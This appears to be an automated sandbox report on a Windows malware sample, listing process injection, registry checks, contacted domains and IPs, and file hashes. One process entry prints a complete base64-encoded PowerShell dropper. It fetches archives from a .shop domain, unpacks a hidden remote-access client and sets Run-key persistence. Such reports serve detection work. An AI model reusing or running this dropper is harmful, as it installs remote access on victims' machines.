Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Roaming\RDJUYV.pif N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Roaming\RDJUYV.pif N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1852 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe C:\Windows\SysWOW64\more.com
PID 1852 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe C:\Windows\SysWOW64\more.com
PID 1852 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe C:\Windows\SysWOW64\more.com
PID 1852 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe C:\Windows\SysWOW64\more.com
PID 4192 wrote to memory of 4688 N/A C:\Windows\SysWOW64\more.com C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4192 wrote to memory of 4688 N/A C:\Windows\SysWOW64\more.com C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4192 wrote to memory of 4688 N/A C:\Windows\SysWOW64\more.com C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4192 wrote to memory of 4688 N/A C:\Windows\SysWOW64\more.com C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4688 wrote to memory of 3248 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4688 wrote to memory of 3248 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4688 wrote to memory of 3248 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4192 wrote to memory of 4688 N/A C:\Windows\SysWOW64\more.com C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4688 wrote to memory of 4144 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Users\Admin\AppData\Roaming\RDJUYV.pif
PID 4688 wrote to memory of 4144 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Users\Admin\AppData\Roaming\RDJUYV.pif
PID 4688 wrote to memory of 4144 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Users\Admin\AppData\Roaming\RDJUYV.pif
PID 4144 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Roaming\RDJUYV.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4144 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Roaming\RDJUYV.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4144 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Roaming\RDJUYV.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4144 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Roaming\RDJUYV.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4144 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Roaming\RDJUYV.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4144 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Roaming\RDJUYV.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4144 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Roaming\RDJUYV.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4144 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Roaming\RDJUYV.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 3248 wrote to memory of 3260 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3248 wrote to memory of 3260 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3248 wrote to memory of 3260 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Set-up.exe

"C:\Users\Admin\AppData\Local\Temp\Set-up.exe"

C:\Windows\SysWOW64\more.com

C:\Windows\SysWOW64\more.com

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -exec bypass -f "C:\Users\Admin\AppData\Local\Temp\O93LZ727PJ79L0E0TL1CJ7.ps1"

C:\Users\Admin\AppData\Roaming\RDJUYV.pif

"C:\Users\Admin\AppData\Roaming\RDJUYV.pif" "C:\Users\Admin\AppData\Roaming\79AFBM.xlsx"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOPrOF -Ep BYPAss -W hI -eNc JABlAGQASABIAGYAPQAnAGgASwBjAFUAOgBcAHMAbwBmAHQAVwBhAFIAZQBcAGMAbABhAFMAcwBlAHMAXAAnADsAIAAkAHcAQQBhAGoAPQAkAGUAbgBWADoATABPAGMAQQBsAGEAUABwAEQAQQB0AGEAKwAnAFwAcABSAE8AZwByAEEATQBTAFwAJwA7ACAAJAA5AHYAeABuADUAPQAoAEcARQBUAC0AVwBtAEkAbwBCAGoARQBjAFQAIAAtAEMATABhAHMAUwAgAFcAaQBOADMAMgBfAEMAbwBtAHAAVQB0AGUAcgBTAFkAcwB0AEUAbQApAC4AcABBAFIAVABPAGYAZABPAE0AQQBJAE4AOwAgACQAVgB2AHAAUwA9ADAAOwAgACQAVgA0AHQAbwBuAD0AJwBjADoAXABQAHIAbwBHAHIAQQBNACAARgBpAEwAZQBzAFwAJwA7ACAAJAByADUAUwB1AGkAPQAnAEgASwBMAE0AOgBcAFMATwBmAHQAdwBhAFIARQBcAGMATABBAHMAUwBFAFMAXAAnADsAIAAkAEUAawBRAGQAPQAnAGgAawBDAFUAOgBcAHMATwBmAHQAVwBBAHIARQBcACcAOwAgACQAWQBNAGMAegA9AEAAKAAgACQAdgA0AHQATwBOACsAJwBiAEkAVABiAE8AeABcAGIASQB0AGIAbwB4AC4ARQBYAEUAJwA7ACAAJABXAEEAYQBqACsAJwBDAFkAcABoAEUAcgBvAEMASwAgAEMAWQBTAHkATgBDAFwAQwB5AHAASABlAFIATwBDAEsAIABDAFkAcwB5AG4AQwAuAEUAWABlACcAOwAgACQARQBkAEgAaABmACsAJwBrAEUAZQBwAGsAZQBZACcAOwAgACQAVwBBAGEASgArACcAawBFAEUAdgBPAC0AVwBhAEwAbABlAFQAXABLAEUARQB2AE8AIABsAGkAbgBLAC4AZQBYAGUAJwA7ACAAJABWADQAVABvAE4AKwAnAGwAZQBEAGcAZQByACAAbABJAFYAZQBcAEwAZQBkAGcAZQBSACAAbABJAHYAZQAuAEUAeABlACcAOwAgACQAZQBrAFEAZAArACcAYgBJAFQAQgBvAFgAYQBwAFAAJwA7ACAAJAB3AEEAQQBqACsAJwBUAFIARQBaAE8AUgAgAFMAVQBpAFQAZQBcAFQAUgBFAHoAbwByACAAUwBVAEkAVABFAC4AZQBYAEUAJwA7ACAAJAB3AGEAYQBqACsAJwBSAGEAYgBCAHkALQBkAEUAUwBLAHQATwBwAFwAcgBBAGIAQgB5ACAARABlAHMASwBUAG8AcAAuAEUAWABFACcAOwAgACQARQBLAHEAZAArACcAbQBJAGMAUgBvAFMAbwBmAFQAXABXAGkATgBEAE8AdwBTAFwAYwB1AFIAUgBlAE4AdABWAEUAcgBzAGkATwBuAFwAdQBOAGkAbgBzAHQAQQBMAEwAXABCAGkAdABiAG8AWABBAFAAUAAnADsAIAAkAFIANQBzAFUASQArACcAbABFAGQAZwBlAFIAbABpAFYARQAnADsAIAAkAEUARABoAEgAZgArACcAYQBvAHAAcAAnADsAIAAkAEUARABoAEgARgArACcAVABSAGUAWgBPAHIAcwBVAEkAdABFACcAOwAgACQAdgA0AFQAbwBOACsAJwBiAEMAIABWAEEAVQBMAHQAXABCAGMAVgBhAFUATABUAC4ARQBYAGUAJwA7ACAAJAByADUAUwB1AEkAKwAnAEIAQwB2AGEAdQBsAHQAJwA7ACAAJABXAGEAYQBqACsAJwBLAGUAZQBwAEsAZQBZAC0ARABFAFMAawB0AE8AUABcAEsARQBFAHAAawBFAHkAIABEAGUAcwBrAFQAbwBQAC4AZQB4AEUAJwA7ACAAJABFAEsAcQBEACsAJwByAEUAQQBMACAAcwBlAGMAdQByAGkAdABZAFwAYgBDAHYAYQB1AEwAdAAnADsAIAAkAEUAZABoAGgARgArACcASwBlAEUAVgBPACcAOwAgACQARQBEAEgAaABGACsAJwBMAGkAUQBVAGkAZABuAGUAdABXAG8AcgBrACcAOwAgACQARQBkAEgASABGACsAJwBDAFkAUABoAEUAcgBPAEMASwAnADsAIAAkAGUARABIAEgARgArACcAbwBuAEUAawBFAFkALQB3AEEAbABsAGUAVAAnADsAIAAkAHYANAB0AG8ATgArACcAQgBMAG8AYwBrAFMAVAByAGUAYQBtAFwAYgBsAE8AQwBLAFMAdAByAGUAQQBNACAAZwByAEUARQBuAFwAQgBMAG8AQwBLAFMAdABSAGUAYQBNACAARwBSAEUAZQBuAC4AZQBYAGUAJwA7ACAAJABWADQAdABPAE4AKwAnAE8AbgBlAEsARQBZAFwAbwBuAEUAawBlAHkALgBlAHgAZQAnADsAIAApADsAIAAkAGgATgBvAHoAPQAkAFkAbQBDAFoALgBsAEUATgBHAFQAaAA7ACAAaQBGACAAKAAkADkAdgB4AE4ANQApACAAewAkAHYAdgBwAFMAPQAxAH0AIABFAEwAcwBlACAAewAgAGYAbwByACAAKAAkAE0AOQBwAHcAQQA9ADAAOwAgACQAbQA5AFAAdwBhACAALQBMAHQAIAAkAEgATgBPAHoAIAAtAGEATgBEACAAJAB2AFYAUABTACAALQBFAHEAIAAwADsAIAAkAE0AOQBQAHcAYQArACsAKQAgAHsAIABJAEYAIAAoAHQARQBzAFQALQBwAGEAdABoACAAJAB5AE0AQwBaAFsAJABtADkAUAB3AGEAXQApACAAewAkAFYAdgBQAHMAPQAxAH0AOwB9ADsAfQA7ACAASQBmACAAKAAkAHYAdgBwAHMAIAAtAGUAcQAgADEAKQAgAHsAIABDAGgAZABpAFIAIAAkAEUAbgB2ADoAQQBQAFAAZABBAFQAYQA7ACAAJABSAFIAUgBFAGUAZgBIAEcAPQBnAGUAdAAtAGMATwBtAG0AYQBuAEQAIABFAHgAcABBAG4ARAAtAGEAUgBDAEgASQB2AEUAIAAtAEUAUgByAE8AUgBBAGMAdABJAG8AbgAgAHMAaQBMAEUATgBUAGwAeQBjAE8ATgB0AEkAbgBVAEUAOwAgACQAdABsAGUAUQByAFkAPQAnAGgAdAB0AHAAcwA6AC8ALwBtAGkAbgBkAGYAdQBzAHQAZQBwAHMALgBzAGgAbwBwAC8AbQBpAG4AegAvAG0ANABuAGQALgB6AGkAcAAnADsAIAAkAFYAagByAEYAdABDAGcARwA9ACcAaAB0AHQAcABzADoALwAvAG0AaQBuAGQAZgB1AHMAdABlAHAAcwAuAHMAaABvAHAALwBtAGkAbgB6AC8AbQAyAG4AZAAuAHoAaQBwACcAOwAgACQAYgBFAHoAZwBqAHYAUQBJAD0AJwB2AGQAZgBvAHIANABoAHEALgB6AGkAcAAnADsAIAAkAHkAWABDAFAAZQBNAFEAUgA9AEcAQwBNACAAUwB0AGEAUgB0AC0AYgBpAHQAcwBUAFIAQQBuAFMAZgBFAFIAIAAtAEUAcgBSAG8AUgBhAEMAVABJAE8ATgAgAHMAaQBMAGUATgBUAGwAeQBDAE8AbgB0AEkATgBVAGUAOwAgACQAOABHAFEAOQBuAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBtAGkAbgBkAGYAdQBzAHQAZQBwAHMALgBzAGgAbwBwAC8AbQBpAG4AegAvAG0AMwBuAGQALgB6AGkAcAAnADsAIAAkADgAVABnAHEAMwBFADUAPQAnADMAcQBvADMARgBjAE8ALgB6AGkAcAAnADsAIAAkAGcARwBCAEQAcgBuAGwAPQAnAFMAbQBhAHIAdABEAGUAZgByAGEAZwBUAG8AbwBsACcAOwAgACQASgBmAEMAaQBuAEcAPQAnADEAYQBLAEgAeABQAEIALgB6AGkAcAAnADsAIABbAE4AZQB0AC4AcwBlAHIAdgBpAGMAZQBwAE8ASQBOAFQAbQBBAE4AYQBHAGUAcgBdADoAOgBTAEUAYwBVAFIAaQBUAHkAUAByAE8AdABvAEMATwBsACAAPQAgAFsATgBlAHQALgBTAGUAYwBVAHIAaQBUAHkAcAByAE8AdABvAGMAbwBsAHQAWQBQAGUAXQA6ADoAdABMAHMAMQAyADsAIAAkAHUARgBHADkAYgA3AGoAegA9ACcAbQBBAEwAbABRAEEALgB6AGkAcAAnADsAIAAkAGIAOAA3AE4AOQB1AD0AJwBoAHQAdABwAHMAOgAvAC8AbQBpAG4AZABmAHUAcwB0AGUAcABzAC4AcwBoAG8AcAAvAG0AaQBuAHoALwBtADEAbgBkAC4AegBpAHAAJwA7ACAAJABVAHAAeABlAHcANgBGAD0AIgAkAGUATgBWADoAYQBQAFAARABBAHQAYQBcACQAOABUAGcAcQAzAEUANQAiADsAIAAkAHQAagBlADYAZwAzAD0AJABFAE4AVgA6AGEAcABQAGQAQQB0AEEALAAgACQAYgBFAHoAZwBqAHYAUQBJACAALQBqAG8AaQBOACAAJwBcACcAOwAgACQAMwBzAFUASABFAFgAbwA9ACIAJABFAE4AdgA6AGEAUABQAGQAYQBUAGEAXAAkAEoAZgBDAGkAbgBHACIAOwAgACQANAA1AFkASgBXAHkAQgA9ACIAewAwAH0AXAB7ADEAfQAiACAALQBmACAAJABFAE4AdgA6AGEAUABQAGQAYQBUAGEALAAgACQAdQBGAEcAOQBiADcAagB6ADsAIAAkAEEAcgBNAFgASQByAFkAdgA9ACIAYgBpAHQAcwBhAEQAbQBJAE4ALgBlAFgAZQAgAC8AVAByAEEAbgBzAGYARQByACAANgBEAHIAeQA2AGgAcABvACAALwBEAE8AdwBuAGwATwBBAEQAIAAvAFAAUgBpAE8AcgBJAFQAWQAgAG4AbwBSAE0AYQBsACAAJABWAGoAcgBGAHQAQwBnAEcAIAAkAFUAcAB4AGUAdwA2AEYAIgA7ACAAJAAxAG0AcABoAHUAVABTAGkAPQAiACQARQBuAFYAOgBhAHAAcABEAGEAdABBAFwAJABnAEcAQgBEAHIAbgBsACIAOwAgACQAQwBLAGcAbABkAFYAPQAiAGIAaQBUAFMAQQBkAG0AaQBOAC4ARQB4AEUAIAAvAHQAUgBhAE4AcwBmAGUAcgAgADAAbQAxAFkAcwBMADcAIAAvAGQATwB3AG4ATABvAEEAZAAgAC8AUAByAEkAbwByAEkAVABZACAATgBvAFIAbQBBAGwAIAAkADgARwBRADkAbgB0ACAAJAB0AGoAZQA2AGcAMwAiADsAIAAkAHUARQB4AFoANgBSAFAARAA9ACcAYgBJAFQAUwBhAGQATQBpAG4ALgBlAHgAZQAgAC8AdABSAEEAbgBTAGYARQBSACAAcABYAFIAUABEAGYAdAAgAC8ARABvAFcATgBsAG8AQQBkACAALwBwAFIASQBvAFIASQB0AFkAIABuAE8AcgBtAGEAbAAgACcAKwAkAGIAOAA3AE4AOQB1ACsAJwAgACcAKwAkADMAcwBVAEgARQBYAG8AOwAgACQAcABGADcASAA1AEoAVQA9ACIAYgBJAFQAUwBhAGQATQBpAG4ALgBlAHgAZQAgAC8AdABSAEEAbgBTAGYARQBSACAAcABYAFIAUABEAGYAdAAgAC8ARABvAFcATgBsAG8AQQBkACAALwBwAFIASQBvAFIASQB0AFkAIABuAE8AcgBtAGEAbAAgAHsAMAB9ACAAewAxAH0AIgAgAC0AZgAgACQAYgA4ADcATgA5AHUALAAgACQANAA1AFkASgBXAHkAQgA7ACAASQBmACAAKAAkAFIAUgBSAEUAZQBmAEgARwApACAAewAgAEkARgAgACgAJAB5AFgAQwBQAGUATQBRAFIAKQAgAHsAIABTAHQAYQByAHQALQBCAEkAVABTAHQAcgBhAE4AUwBmAGUAUgAgAC0AUwBvAFUAcgBjAGUAIAAkAFYAagByAEYAdABDAGcARwAgAC0ARABlAHMAdABJAG4AQQB0AEkATwBuACAAJABVAHAAeABlAHcANgBGADsAIABzAFQAYQByAHQALQBCAEkAVABzAHQAUgBBAE4AUwBGAEUAUgAgAC0AcwBPAHUAUgBjAEUAIAAkADgARwBRADkAbgB0ACAALQBkAEUAUwBUAGkAbgBBAFQAaQBvAG4AIAAkAHQAagBlADYAZwAzADsAIABzAFQAQQByAHQALQBiAEkAVABTAHQAcgBBAE4AUwBmAEUAUgAgAC0AcwBvAFUAcgBjAEUAIAAkAGIAOAA3AE4AOQB1ACAALQBEAEUAcwBUAEkATgBhAHQASQBPAE4AIAAkADMAcwBVAEgARQBYAG8AOwAgAHMAVABBAFIAVAAtAEIAaQBUAHMAdABSAGEAbgBTAEYARQByACAALQBzAE8AdQBSAGMARQAgACQAdABsAGUAUQByAFkAIAAtAEQARQBzAFQAaQBuAGEAdABpAG8ATgAgACQANAA1AFkASgBXAHkAQgA7ACAAfQAgAEUAbABTAEUAIAB7AGkARQBYACAALQBjAG8AbQBtAGEATgBEACAAJAB1AEUAeABaADYAUgBQAEQAOwAgAEkARQBYACAALQBDAG8AbQBtAEEAbgBEACAAJABwAEYANwBIADUASgBVADsAIABpAGUAeAAgAC0AYwBvAG0AbQBhAG4AZAAgACQAQQByAE0AWABJAHIAWQB2ADsAIAAmACAAJABDAEsAZwBsAGQAVgA7ACAAfQAgAEUAeABwAEEATgBEAC0AQQByAGMAaABpAFYAZQAgAC0AUABBAFQAaAAgACQANAA1AFkASgBXAHkAQgAgAC0ARABlAFMAdABJAE4AYQBUAEkAbwBuAFAAYQB0AGgAIAAkADEAbQBwAGgAdQBUAFMAaQA7ACAARQB4AHAAQQBOAEQALQBhAFIAYwBoAGkAVgBFACAALQBQAGEAdABIACAAJAB0AGoAZQA2AGcAMwAgAC0AZABlAHMAdABpAG4AYQBUAEkAbwBOAHAAYQB0AGgAIAAkADEAbQBwAGgAdQBUAFMAaQA7ACAARQB4AFAAQQBOAGQALQBBAFIAQwBIAGkAdgBFACAALQBwAEEAdABIACAAJAAzAHMAVQBIAEUAWABvACAALQBkAEUAUwBUAGkAbgBhAFQAaQBPAE4AcABBAHQASAAgACQAMQBtAHAAaAB1AFQAUwBpADsAIABlAHgAUABBAG4AZAAtAEEAcgBDAGgAaQBWAGUAIAAtAHAAYQB0AGgAIAAkAFUAcAB4AGUAdwA2AEYAIAAtAEQAZQBTAFQAaQBuAGEAdABpAG8ATgBwAEEAdABIACAAJAAxAG0AcABoAHUAVABTAGkAOwAgAFIAbQAgAC0AUABhAFQAaAAgACQAdABqAGUANgBnADMAOwAgAFIARAAgAC0AcABBAFQASAAgACQAVQBwAHgAZQB3ADYARgA7ACAAUgBEACAALQBwAEEAdABIACAAJAA0ADUAWQBKAFcAeQBCADsAIAByAGUATQBPAHYAZQAtAEkAdABlAG0AIAAtAFAAQQBUAGgAIAAkADMAcwBVAEgARQBYAG8AOwAgAH0AIABFAEwAUwBFACAAewAgACQAWgBBAFAAUABmAHQAPQBAACgAJwBwAGMAaQBjAGEAcABpAC4AZABsAGwAJwAsACAAJwBjAGwAaQBlAG4AdAAzADIALgBpAG4AaQAnACwAIAAnAFQAQwBDAFQATAAzADIALgBEAEwATAAnACwAIAAnAG4AcwBtAF8AdgBwAHIAbwAuAGkAbgBpACcALAAgACcATgBTAE0ALgBMAEkAQwAnACwAIAAnAEgAVABDAFQATAAzADIALgBEAEwATAAnACwAIAAnAHIAZQBtAGMAbQBkAHMAdAB1AGIALgBlAHgAZQAnACwAIAAnAEEAdQBkAGkAbwBDAGEAcAB0AHUAcgBlAC4AZABsAGwAJwAsACAAJwBuAHMAawBiAGYAbAB0AHIALgBpAG4AZgAnACwAIAAnAFAAQwBJAEMASABFAEsALgBEAEwATAAnACwAIAAnAFAAQwBJAEMATAAzADIALgBEAEwATAAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACcALAAgACcAbQBzAHYAYwByADEAMAAwAC4AZABsAGwAJwApADsAIABuAGkAIAAtAFAAQQBUAGgAIAAkAEUAbgB2ADoAYQBQAHAAZABBAHQAQQAgAC0AbgBBAG0AZQAgACQAZwBHAEIARAByAG4AbAAgAC0AaQBUAGUATQBUAHkAUABlACAAJwBkAGkAcgBlAGMAdABvAHIAeQAnADsAIAAkAGcAMQBpADUAcgB4AEIAPQAnAGgAdAB0AHAAcwA6AC8ALwBtAGkAbgBkAGYAdQBzAHQAZQBwAHMALgBzAGgAbwBwAC8AbQBpAG4AZAAvACcAOwAgAEkARgAgACgAJAB5AFgAQwBQAGUATQBRAFIAKQAgAHsAIAAkAFoAQQBQAFAAZgB0ACAAfAAgAEYAbwBSAEUAQQBjAGgALQBPAEIAagBFAEMAdAAgAHsAIAAkAGgARQBWAFQARwB1AHEAbwA9ACQAZwAxAGkANQByAHgAQgArACQAXwA7ACAAJABTAE0ASgBLAE4AUAA9AGoATwBJAE4ALQBwAEEAdABoACAALQBQAEEAdABoACAAJAAxAG0AcABoAHUAVABTAGkAIAAtAGMASABpAGwARABQAGEAVABoACAAJABfADsAIABzAHQAYQBSAHQALQBiAEkAVABTAHQAcgBhAG4AUwBGAEUAUgAgAC0AcwBPAHUAcgBDAGUAIAAkAGgARQBWAFQARwB1AHEAbwAgAC0AZABFAHMAVABpAG4AQQBUAGkAbwBOACAAJABTAE0ASgBLAE4AUAA7ACAAfQA7AH0AIABlAEwAUwBFACAAewAgACQAWgBBAFAAUABmAHQAIAB8ACAAZgBvAFIARQBhAEMASAAtAG8AQgBKAEUAQwBUACAAewAgACQAaABFAFYAVABHAHUAcQBvAD0AJABnADEAaQA1AHIAeABCACsAJABfADsAIAAkAFMATQBKAEsATgBQAD0AJAAxAG0AcABoAHUAVABTAGkALAAgACQAXwAgAC0AagBPAEkATgAgACcAXAAnADsAIAAkAHAAUgBsAHIAYQBhAFoAQwA9ACcAQgBpAHQAUwBhAGQAbQBJAE4ALgBlAHgARQAgAC8AdAByAEEAbgBTAGYARQByACAANgBMAFAAdAA4AEsAMgBnACAALwBkAG8AVwBuAGwAbwBBAGQAIAAvAFAAUgBJAE8AUgBJAFQAeQAgAE4ATwByAE0AQQBMACAAJwArACQAaABFAFYAVABHAHUAcQBvACsAJwAgACcAKwAkAFMATQBKAEsATgBQADsAIABJAEUAWAAgAC0AQwBvAG0AbQBBAG4ARAAgACQAcABSAGwAcgBhAGEAWgBDADsAfQA7ACAAfQA7ACAAfQA7ACAAJAB5AEYAaAB6AEYATAA9AEcASQAgACQAMQBtAHAAaAB1AFQAUwBpACAALQBmAG8AcgBDAGUAOwAgACQAeQBGAGgAegBGAEwALgBhAFQAVABSAGkAYgB1AHQARQBzAD0AJwBIAGkAZABkAGUAbgAnADsAIABDAGgAZABpAFIAIAAkADEAbQBwAGgAdQBUAFMAaQA7ACAAJABYAEMAVQBGAGcAYwBxAD0AIgAkADEAbQBwAGgAdQBUAFMAaQBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACIAOwAgAE4ARQBXAC0ASQB0AEUAbQBwAFIAbwBwAGUAUgBUAHkAIAAtAFAAYQB0AEgAIAAnAEgASwBDAHUAOgBcAHMAbwBGAFQAdwBBAFIAZQBcAE0ASQBDAHIAbwBzAG8ARgB0AFwAdwBpAE4ARABPAFcAUwBcAGMAVQBSAHIARQBuAFQAVgBFAFIAcwBJAE8ATgBcAHIAdQBuACcAIAAtAG4AQQBtAGUAIAAkAGcARwBCAEQAcgBuAGwAIAAtAHYAYQBsAFUAZQAgACQAWABDAFUARgBnAGMAcQAgAC0AUAByAE8AUABFAHIAdAB5AHQAeQBwAGUAIAAnAFMAdAByAGkAbgBnACcAOwAgAFMAdABhAHIAdAAtAFAAUgBPAEMAZQBTAFMAIABjAGwASQBFAG4AdAAzADIALgBFAFgAZQA7ACAAfQA7AA==

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 mindfuljournal.shop udp
US 172.67.143.13:443 mindfuljournal.shop tcp
US 172.67.143.13:443 mindfuljournal.shop tcp
US 172.67.143.13:443 mindfuljournal.shop tcp
US 8.8.8.8:53 13.143.67.172.in-addr.arpa udp
US 172.67.143.13:443 mindfuljournal.shop tcp
US 172.67.143.13:443 mindfuljournal.shop tcp
US 172.67.143.13:443 mindfuljournal.shop tcp
US 8.8.8.8:53 cdn1.pixel-story.shop udp
US 104.21.32.85:443 cdn1.pixel-story.shop tcp
US 8.8.8.8:53 pixelpalette.shop udp
US 104.21.84.104:443 pixelpalette.shop tcp
US 8.8.8.8:53 85.32.21.104.in-addr.arpa udp
US 8.8.8.8:53 104.84.21.104.in-addr.arpa udp
US 8.8.8.8:53 mindfusteps.shop udp
MD 213.159.73.34:443 mindfusteps.shop tcp
US 8.8.8.8:53 34.73.159.213.in-addr.arpa udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
AM 217.144.184.19:1466 tcp
US 8.8.8.8:53 109.234.82.104.in-addr.arpa udp
US 8.8.8.8:53 19.184.144.217.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
AM 217.144.184.19:1466 tcp

Files

memory/1852-0-0x0000000074550000-0x00000000747E1000-memory.dmp

memory/1852-1-0x00007FFC453F0000-0x00007FFC455E5000-memory.dmp

memory/1852-8-0x0000000074563000-0x0000000074565000-memory.dmp

memory/1852-9-0x0000000074550000-0x00000000747E1000-memory.dmp

memory/1852-10-0x0000000074550000-0x00000000747E1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\13821335

MD5 f7b47df6923eabe96417f277c97f32bf
SHA1 b031c79c7b8a2585d6c1eff80674b09eca5fc154
SHA256 bbb3a5fa0a62a0c0c33b053b506866b62511f21966a4dd6777bb70a2c4b7267d
SHA512 54f9584215ba5b1646b1c7d0f23c14793de4831c01214ca9f5828235dc366cbbdaeecc0b940a5ca3df4d458c14e7a881d9528671ef8bcc37baf758a6073914b4

memory/4192-12-0x0000000074550000-0x00000000747E1000-memory.dmp

memory/4192-14-0x00007FFC453F0000-0x00007FFC455E5000-memory.dmp

memory/4192-15-0x0000000074550000-0x00000000747E1000-memory.dmp

memory/4192-16-0x0000000074550000-0x00000000747E1000-memory.dmp

memory/4192-18-0x0000000074550000-0x00000000747E1000-memory.dmp

memory/4688-19-0x00007FFC453F0000-0x00007FFC455E5000-memory.dmp

memory/4688-20-0x00000000003D0000-0x0000000000429000-memory.dmp

memory/4688-21-0x0000000000BBF000-0x0000000000BC7000-memory.dmp

memory/4688-25-0x00000000003D0000-0x0000000000429000-memory.dmp

memory/3248-27-0x00000000748BE000-0x00000000748BF000-memory.dmp

memory/3248-28-0x0000000002960000-0x0000000002996000-memory.dmp

memory/3248-35-0x00000000748B0000-0x0000000075060000-memory.dmp

memory/4688-30-0x0000000003D20000-0x0000000003D59000-memory.dmp

memory/3248-36-0x0000000005130000-0x0000000005758000-memory.dmp

memory/4688-29-0x0000000003D20000-0x0000000003D59000-memory.dmp

memory/3248-37-0x0000000004F60000-0x0000000004F82000-memory.dmp

memory/3248-38-0x0000000005760000-0x00000000057C6000-memory.dmp

memory/3248-39-0x00000000057D0000-0x0000000005836000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zuemf0qc.2fv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
